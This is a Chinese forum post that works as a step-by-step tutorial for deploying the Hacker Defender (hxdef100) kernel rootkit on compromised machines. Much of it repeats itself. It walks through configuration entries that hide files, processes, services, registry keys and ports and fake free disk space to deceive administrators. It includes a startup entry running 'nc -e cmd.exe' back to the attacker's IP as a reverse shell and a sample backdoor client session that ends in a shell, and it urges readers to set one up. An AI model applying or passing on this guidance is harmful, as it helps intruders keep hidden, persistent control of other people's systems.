|
|
发表于 2010-3-24 07:19:54
|显示全部楼层
本帖最后由 疯狂来了 于 2010-3-24 07:22 编辑
在众多后门中,Rootkit是一个非常不错的选择。在当前比较流行的Rootkit之中, Hacker defender尤其被人关注, 由于它作为内核的一部分运行,所以这种后门将会越来越比传统技术更加强大更加不易被发觉。一旦被安装运行到目标机器上,系统就会完全被控制在hacker 手中了——甚至系统管理员根本找不到安全隐患的痕迹。
作为一款非常出色的Rootkit,hxdef100给我们提供了很多可选择配置的功能,比如:用户可以通过本软件隐藏文件、进程、系统服务、系统驱动、注册表键的键和键值、打开的端口以及虚构可用磁盘空间,下面我们就来看一下这款诱人的内核级后门是如何打造出来的。
一,配置
首先,检查我们下载来的hxdef,应该具备如下文件:
bdcli100.EⅩE ;自带后门客户端连接文件
hxdef100.EⅩE ;Hxdef100后门主程序
hxdef100.2.ini ;hxdef配置文件模板
hxdef100.ini ;hxdef经过简单加密过的配置文件模板
rdrbs100.EⅩE ;Redirector工具(类似与端口转发)
打开hxdef100.2.ini,我们可以看到hxdef的默认配置选项,首先,我们先对[Hidden Table]项进行配置,[Hidden Table] 是要隐藏的列表,写在这个项目下的字符串,不管是作为文件名还是目录名,都将不在WINDOWS任务管理器、资源管理器中出现,并且支持通配符,一行一 个。例如:
[Hidden Table]
hxdef* ;隐藏所有以hxdef开头的文件名、目录名等等
rcmd.EⅩE ;隐藏rcmd.EⅩE文件
下一步,就是[Root Processes] 项,这里是能在配置要隐藏能在进程管理器中显示的进程名,同样支持统配符。配置如下:
[Root Processes]
hxdef* ;隐藏以hxdef开头的所有进程
rcmd.EⅩE ;隐藏rcmd.EⅩE进程
[Hidden Services]项目,是所要进行隐藏的服务列表,hxdef非但能隐藏自身,而且可以为其他后门、程序提供隐藏服务。这是hxdef的一大亮点。首先当然是隐藏自身的服务名,而后是其他服务,一行一个,也支持统配符。配置例如:
[Hidden Services]
HackerDefender* ;这里是你的hxdef的服务名
WinMgrs ;这个是我的WinEggDrop 的服务名
[Hidden RegKeys]隐藏RegKey列表,我们添加的服务,都将会在HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services 找到对应的注册表项,所以,为了做到彻底隐藏,我们就要将隐藏进行到底。配置例子:
[Hidden RegKeys]
HackerDefender100 ;hxdef默认的服务名
LEGACY_HACKERDEFENDER100 ;LEGACY_加hexdef服务名
HackerDefenderDrv100 ;hexdef默认的驱动名
LEGACY_HACKERDEFENDERDRV100 ;LEGACY_加 hexdef驱动名
其他的服务也如此添加,不同服务对应自身的服务名。
[Hidden RegValues] 所要隐藏的注册表键值列表,这里不经常用到,用法也颇为简单,只需要把所要隐藏的注册表键值写入到该项目下即刻。
[Startup Run] 后门在启动时,同时启动的其他项目列表,这里我们可以放进一些不能随开机启动的项目,比如NC,用法:
[Startup Run]
nc -e %windir%\system32\cmd.EⅩE 你的IP 端口
这里允许使用例如:%windir%、%tmpdir%等之类的环境变量。
[Free Space] 通常我们会利用肉鸡做我们的PUB FTP或放入自己的一些东东,久而久之,磁盘占用问题就出来了,这个选项就是用于欺骗管理员某磁盘上多加入的磁盘空间……
看看是如何配置的吧:
[Free Space]
C: 1024717696 ;增加C盘1个G的虚拟空间(假的)
D: 1024717696 ;增加D盘1个G的虚拟空间(假的)
[Hidden Ports] 隐藏端口列表,这个我们平时用到的比较多,写在这个列表一的端口,可以不再显示禁用词语,用netstat –na 也查不到喔。配置方法很简单:
[Hidden Ports]
TCP:4136,8922,9333 ;要隐藏的TCP协议端口
UDP:4136,8922,9333 ;要隐藏的UDP协议端口
[Settings] hxdef的设置部分,可以设置hxdef的服务名、描述、显示名等等。设置方法如下:
[Settings]
Password=Lilo654321 ;后门连接密码
BackdoorShell=stdio?.EⅩE ;后门连接后,会将cmd.EⅩE复制一份,每个连接复制一份,?为统配符。连接完毕后会自动删除。
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender100 ;hxdef的服务名,要和上面[Hidden Services]项目中的对应喔。
ServiceDisplayName=HXD Service 100 ;hxdef服务显示名
ServiceDescription=powerful NT rootkit ;hxdef服务描述
DriverName=HackerDefenderDrv100 ;hxdef驱动名
DriverFileName=hxdefdrv.sys ;hxdef驱动文件名。
[Comments]为注释部分,由于hxdef100的配置文件为ini,所以,一定要把[Hidden Table]
项目填写正确,将ini文件也隐藏掉,否则。。就等着哭喽~
以上,我们了解了Hxdef100的配置方法,在种植时,需要注意一下几个开关选项及事项:
-:installonly ;仅仅进行安装服务,并不同步运行。
-:refresh ;重新读取INI设置
-:noservice ;正常运行,但不安装成服务,从新启动时恢复,测试时使用。
-:uninstall ;将hxdef移出内存,并且断开所有连接及卸载服务
二,使用
上面的配置比较死板,大家也看累了吧?呵呵,下面我来看看它的简单使用方法!
客户端连接程序bdcli100.EⅩE用法也尤为简单,逐个输入所要求输入的选项即刻进入Shell,hxdef100自带的后门,并不是传统后门,象 bits和WinEggDrop老哥的PortLess类似,后门程序并不开端口,而是Sniffer所有网卡是否有发送连接字符串,然后进行连接的。用 法例如:
C:\>bdcli100
Host: 192.168.0.102 ;连接远程服务器
Port: 80 ;进行连接的端口
Pass: Lilo654321 ;hxdef100的连接密码
connecting server ...
receiving banner ...
opening backdoor ..
backdoor found
checking backdoor ......
backdoor ready
authorization sent, waiting for reply
authorization - SUCCESSFUL
backdoor activated!
close shell and all progz to end session ;过了这一步,就得到Shell啦。
另外,端口复用技术也在这个后门上得到发挥,前文后门专题已经有介绍了,这里就不再多说,大家可以不光利用80端口控**务器,53、21 等端口都可以连入系统!
对于这么好的一个后门+Rootkit,你不心动吗?还等什么,赶快去光盘下载配置一个吧!
下载来的Hxdef100具有以下文件
1. bdcli100.EⅩE 自带后门客户端连接文件
2. hxdef100.EⅩE Hxdef100后门主程序
3. hxdef100.2.ini 配置文件模板
4. hxdef100.ini 经过简单加密的配置文件模板
打开hxdef.2.ini ,我们可以看到它的默认配置选项,首先,我们先对[Hidden Table]项进行配置,
[Hidden Table]是要隐藏的列表,写在这个目录下的字符串,不管是作为文件名还是目录名,
都将不在Windows的任务管理器、资源管理器中出现,并且支持通配符,一行一个。
例如:
[Hidden Table]
hxdef* /*隐藏所有以hxdef开头的文件名、目录名等
rcmd.EⅩE /*隐藏rcmd.EⅩE文件
-----------------------------------------
下一步,就是
[Root Processes]这里是配置要隐藏能在进程管理器中显示的进程名,同样支持通配符。
例如:
[Root Processes]
hxdef* /*隐藏所有以hxdef开头的所有进程
rcmd.EⅩE /*隐藏rcmd.EⅩE文件进程
------------------------------------------
[Hidden Services]项目,是所要隐藏的服务列表,hxdef非但可以隐藏自身,而且还可以为其他后门、程序提供隐藏服务。
首先当然是隐藏自身了,而后是其他的服务,支持通配符,一行一个。
例如:
[Hidden Services]
Hackerdefender* /*这个是你的hxdef的服务名
SVCH0ST /*这个是我的网络神偷免杀版的服务名,那个o其实是数字0
----------------------------------------------
[Hidden RegKeys]隐藏RegKeys列表,我们天家的服务都是在Hkey_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\Services
找到对应的注册表项,所以为了做到彻底隐藏,我们就要将隐藏进行到底,
例如:
[Hidden RegKeys]
Hackerdefender100 /*默认服务名
LEGACY_Hackerdefender100 /*LEGACY加hxdef的服务名
HackerdefenderDrv100 /*hxdef的默认驱动名
LEGACY_HackerdefenderDrv100 /*LEGACY加HackerdefenderDrv100的服务名
其他的服务也如此添加,不同服务应该对应自身的服务名。
---------------------------------------------
[Startup Run]
nc -e %windir%\system\cmd.EⅩE 你的ip 端口
这里允许使用诸如%windir% %tmpdir% 等环境变量。
--------------------------------------------
[Hidden Ports]
TCP:2004,8922,9333 /*要隐藏的TCP协议端口
UDP:2004,8922,9333 /*要隐藏的UDP协议端口
---------------------------------------------
[Settings] hxdef 的设置部分,可以设置hxdef的服务名,描述,显示名等。设置方法如下:
[Settings]
Password=eyas.126.com /*后门连接密码
BackdoorShell=stdio?.EⅩE /*后门连接后,会将cmd.EⅩE复制一份,每个连接复制一份,?为通配符。连接完毕后,自动删除。
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender100 /*hxdef的服务名,要和上面的[Hidden Services]项对应!
ServiceDisplayName=HXD Service 100 /*hxdef的服务显示名
ServiceDescription=powerfui NT rookit /*hxdef的服务描述
DriverName=HackerDefenderDrv100 /*hxdef驱动名
DriverFileName=hxdefdrv.sys /*hxdef驱动文件名
-------------------------------------------
[Comments]为注释部分,由于hxdef100的配置文件为.ini,所以一定要把[Hidden Table]项目填写正确完全,
尤其把这个.ini文件也要隐藏掉,不然你就等着郁闷吧!
----------------------------------------------
以上我们知道了hxdef的配制方法,在种后门的时候,还需要注意以下的几个开关选项及事项:
-:installonly /*仅仅进行安装服务,并不同步运行
-:refresh /*重新读取ini设置
-:noservice /*正常运行,但是不安装服务,重新启动的时候恢复, 做测试的时候用
-:uninstall /*将hxdef移出内存,并且断开所有连接和卸载服务 |
|
狗仔卡
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
发表于 2010-9-5 19:52:20